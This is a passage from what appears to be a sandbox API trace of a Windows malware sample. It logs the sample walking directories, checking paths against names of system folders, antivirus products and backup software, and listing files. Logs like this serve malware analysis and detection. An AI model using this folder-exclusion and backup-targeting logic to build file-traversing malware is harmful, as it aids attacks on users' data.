OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT OFFICE\\") returned 0x12 [0058.506] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.506] CharUpperBuffW (in: lpsz="\\WINDOWS SIDEBAR\\", cchLength=0x11 | out: lpsz="\\WINDOWS SIDEBAR\\") returned 0x11 [0058.506] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.506] CharUpperBuffW (in: lpsz="\\WINDOWS MEDIA PLAYER\\", cchLength=0x16 | out: lpsz="\\WINDOWS MEDIA PLAYER\\") returned 0x16 [0058.506] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.506] CharUpperBuffW (in: lpsz="\\DVD MAKER\\", cchLength=0xb | out: lpsz="\\DVD MAKER\\") returned 0xb [0058.506] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.506] CharUpperBuffW (in: lpsz="\\WINDOWSPOWERSHELL\\", cchLength=0x13 | out: lpsz="\\WINDOWSPOWERSHELL\\") returned 0x13 [0058.506] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.506] CharUpperBuffW (in: lpsz="\\WINDOWS DEFENDER\\", cchLength=0x12 | out: lpsz="\\WINDOWS DEFENDER\\") returned 0x12 [0058.506] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.506] CharUpperBuffW (in: lpsz="\\TOR BROWSER\\", cchLength=0xd | out: lpsz="\\TOR BROWSER\\") returned 0xd [0058.506] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.506] CharUpperBuffW (in: lpsz="\\ASPNET_CLIENT\\", cchLength=0xf | out: lpsz="\\ASPNET_CLIENT\\") returned 0xf [0058.506] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.506] CharUpperBuffW (in: lpsz="\\REFERENCE ASSEMBLIES\\", cchLength=0x16 | out: lpsz="\\REFERENCE ASSEMBLIES\\") returned 0x16 [0058.506] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.506] CharUpperBuffW (in: lpsz="\\MICROSOFT\\PROVISIONING\\", cchLength=0x18 | out: lpsz="\\MICROSOFT\\PROVISIONING\\") returned 0x18 [0058.506] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.507] CharUpperBuffW (in: lpsz="\\MICROSOFT SILVERLIGHT\\", cchLength=0x17 | out: lpsz="\\MICROSOFT SILVERLIGHT\\") returned 0x17 [0058.507] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.507] CharUpperBuffW (in: lpsz="\\PROGRAMDATA\\MICROSOFT\\", cchLength=0x17 | out: lpsz="\\PROGRAMDATA\\MICROSOFT\\") returned 0x17 [0058.507] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.507] CharUpperBuffW (in: lpsz="\\MICROSOFT\\CRYPTO\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\CRYPTO\\") returned 0x12 [0058.507] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.507] CharUpperBuffW (in: lpsz="\\WINDOWSAPPS\\", cchLength=0xd | out: lpsz="\\WINDOWSAPPS\\") returned 0xd [0058.507] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.507] CharUpperBuffW (in: lpsz="\\7-ZIP\\", cchLength=0x7 | out: lpsz="\\7-ZIP\\") returned 0x7 [0058.507] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.507] CharUpperBuffW (in: lpsz="\\WINRAR\\", cchLength=0x8 | out: lpsz="\\WINRAR\\") returned 0x8 [0058.507] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.507] CharUpperBuffW (in: lpsz="\\ESET", cchLength=0x5 | out: lpsz="\\ESET") returned 0x5 [0058.507] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.507] CharUpperBuffW (in: lpsz="\\AVAST", cchLength=0x6 | out: lpsz="\\AVAST") returned 0x6 [0058.507] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.507] CharUpperBuffW (in: lpsz="\\MALWAREBYTES", cchLength=0xd | out: lpsz="\\MALWAREBYTES") returned 0xd [0058.507] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.507] CharUpperBuffW (in: lpsz="\\SYMANTEC ENDPOINT", cchLength=0x12 | out: lpsz="\\SYMANTEC ENDPOINT") returned 0x12 [0058.507] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.507] CharUpperBuffW (in: lpsz="\\TREND MICRO", cchLength=0xc | out: lpsz="\\TREND MICRO") returned 0xc [0058.508] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.508] CharUpperBuffW (in: lpsz="\\BITDEFENDER", cchLength=0xc | out: lpsz="\\BITDEFENDER") returned 0xc [0058.508] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.508] CharUpperBuffW (in: lpsz="\\PANDA SECURITY", cchLength=0xf | out: lpsz="\\PANDA SECURITY") returned 0xf [0058.508] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.508] CharUpperBuffW (in: lpsz="\\MCAFEE", cchLength=0x7 | out: lpsz="\\MCAFEE") returned 0x7 [0058.508] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.508] CharUpperBuffW (in: lpsz="\\KASPERSKY LAB", cchLength=0xe | out: lpsz="\\KASPERSKY LAB") returned 0xe [0058.508] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.508] CharUpperBuffW (in: lpsz="\\KASPERSKYLAB", cchLength=0xd | out: lpsz="\\KASPERSKYLAB") returned 0xd [0058.508] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.508] CharUpperBuffW (in: lpsz="\\AVDEFENDER", cchLength=0xb | out: lpsz="\\AVDEFENDER") returned 0xb [0058.508] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.508] CharUpperBuffW (in: lpsz="\\SOPHOS", cchLength=0x7 | out: lpsz="\\SOPHOS") returned 0x7 [0058.508] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.508] CharUpperBuffW (in: lpsz="\\AVG", cchLength=0x4 | out: lpsz="\\AVG") returned 0x4 [0058.508] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\KO_KR\\SERVICES\\") returned 0x46 [0058.508] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.510] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.510] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x95f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="DEXShare.asfx", cAlternateFileName="DEXSHA~1.ASF")) returned 1 [0058.510] CharUpperBuffW (in: lpsz=".asfx", cchLength=0x5 | out: lpsz=".ASFX") returned 0x5 [0058.510] CharUpperBuffW (in: lpsz="DEXShare.asfx", cchLength=0xd | out: lpsz="DEXSHARE.ASFX") returned 0xd [0058.510] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f71060, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services.asfx", cAlternateFileName="SERVIC~1.ASF")) returned 1 [0058.510] CharUpperBuffW (in: lpsz=".asfx", cchLength=0x5 | out: lpsz=".ASFX") returned 0x5 [0058.510] CharUpperBuffW (in: lpsz="Services.asfx", cchLength=0xd | out: lpsz="SERVICES.ASFX") returned 0xd [0058.510] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f71060, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services.asfx", cAlternateFileName="SERVIC~1.ASF")) returned 0 [0058.510] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.510] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ddfb360, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Spelling.KOR", cAlternateFileName="")) returned 1 [0058.510] CharUpperBuffW (in: lpsz=".KOR", cchLength=0x4 | out: lpsz=".KOR") returned 0x4 [0058.511] CharUpperBuffW (in: lpsz="Spelling.KOR", cchLength=0xc | out: lpsz="SPELLING.KOR") returned 0xc [0058.511] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f4e4720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="updater.KOR", cAlternateFileName="")) returned 1 [0058.511] CharUpperBuffW (in: lpsz=".KOR", cchLength=0x4 | out: lpsz=".KOR") returned 0x4 [0058.511] CharUpperBuffW (in: lpsz="updater.KOR", cchLength=0xb | out: lpsz="UPDATER.KOR") returned 0xb [0058.511] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82bf03e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x5600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weblink.KOR", cAlternateFileName="")) returned 1 [0058.511] CharUpperBuffW (in: lpsz=".KOR", cchLength=0x4 | out: lpsz=".KOR") returned 0x4 [0058.511] CharUpperBuffW (in: lpsz="Weblink.KOR", cchLength=0xb | out: lpsz="WEBLINK.KOR") returned 0xb [0058.511] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82bf03e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x5600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weblink.KOR", cAlternateFileName="")) returned 0 [0058.511] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.511] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d749580, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82ec3e00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82ec3e00, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb_NO", cAlternateFileName="")) returned 1 [0058.511] CharUpperBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", cchLength=0x26 | out: lpsz="C:\\USERS\\5P5NRGJN0JS HALPMCXZ\\DESKTOP\\") returned 0x26 [0058.511] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.511] CharUpperBuffW (in: lpsz="\\PERFLOGS\\", cchLength=0xa | out: lpsz="\\PERFLOGS\\") returned 0xa [0058.511] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.512] CharUpperBuffW (in: lpsz="\\WINDOWS\\", cchLength=0x9 | out: lpsz="\\WINDOWS\\") returned 0x9 [0058.512] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.512] CharUpperBuffW (in: lpsz="\\WINDOWS.OLD\\", cchLength=0xd | out: lpsz="\\WINDOWS.OLD\\") returned 0xd [0058.512] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.512] CharUpperBuffW (in: lpsz="\\WINDOWS10UPGRADE\\", cchLength=0x12 | out: lpsz="\\WINDOWS10UPGRADE\\") returned 0x12 [0058.512] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.512] CharUpperBuffW (in: lpsz="\\$RECYCLE.BIN\\", cchLength=0xe | out: lpsz="\\$RECYCLE.BIN\\") returned 0xe [0058.512] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.512] CharUpperBuffW (in: lpsz="\\WINDOWS NT\\", cchLength=0xc | out: lpsz="\\WINDOWS NT\\") returned 0xc [0058.512] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.512] CharUpperBuffW (in: lpsz="\\COMMON FILES\\", cchLength=0xe | out: lpsz="\\COMMON FILES\\") returned 0xe [0058.512] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.512] CharUpperBuffW (in: lpsz="\\TEMP\\", cchLength=0x6 | out: lpsz="\\TEMP\\") returned 0x6 [0058.512] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.512] CharUpperBuffW (in: lpsz="\\BOOT\\", cchLength=0x6 | out: lpsz="\\BOOT\\") returned 0x6 [0058.512] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.512] CharUpperBuffW (in: lpsz="\\MSOCACHE\\", cchLength=0xa | out: lpsz="\\MSOCACHE\\") returned 0xa [0058.513] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.513] CharUpperBuffW (in: lpsz="\\DEFAULT USER\\", cchLength=0xe | out: lpsz="\\DEFAULT USER\\") returned 0xe [0058.513] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.513] CharUpperBuffW (in: lpsz="FILES\\ACRONIS\\", cchLength=0xe | out: lpsz="FILES\\ACRONIS\\") returned 0xe [0058.513] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.513] CharUpperBuffW (in: lpsz="(X86)\\ACRONIS\\", cchLength=0xe | out: lpsz="(X86)\\ACRONIS\\") returned 0xe [0058.513] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.513] CharUpperBuffW (in: lpsz="FILES\\BACKUPCLIENT\\", cchLength=0x13 | out: lpsz="FILES\\BACKUPCLIENT\\") returned 0x13 [0058.513] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.513] CharUpperBuffW (in: lpsz="(X86)\\BACKUPCLIENT\\", cchLength=0x13 | out: lpsz="(X86)\\BACKUPCLIENT\\") returned 0x13 [0058.513] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.513] CharUpperBuffW (in: lpsz="FILES\\BACKUP MANAGER\\", cchLength=0x15 | out: lpsz="FILES\\BACKUP MANAGER\\") returned 0x15 [0058.514] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.514] CharUpperBuffW (in: lpsz="(X86)\\BACKUP MANAGER\\", cchLength=0x15 | out: lpsz="(X86)\\BACKUP MANAGER\\") returned 0x15 [0058.514] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.514] CharUpperBuffW (in: lpsz="FILES\\CARBONITE\\", cchLength=0x10 | out: lpsz="FILES\\CARBONITE\\") returned 0x10 [0058.514] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\NB_NO\\") returned 0x3d [0058.514] CharUpperBuffW (in: lpsz="(X86)\\CARBONITE\\", cchLength=0x10 | out: lpsz="(X86)\\CARBONITE\\") returned 0x10 [0058.514] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 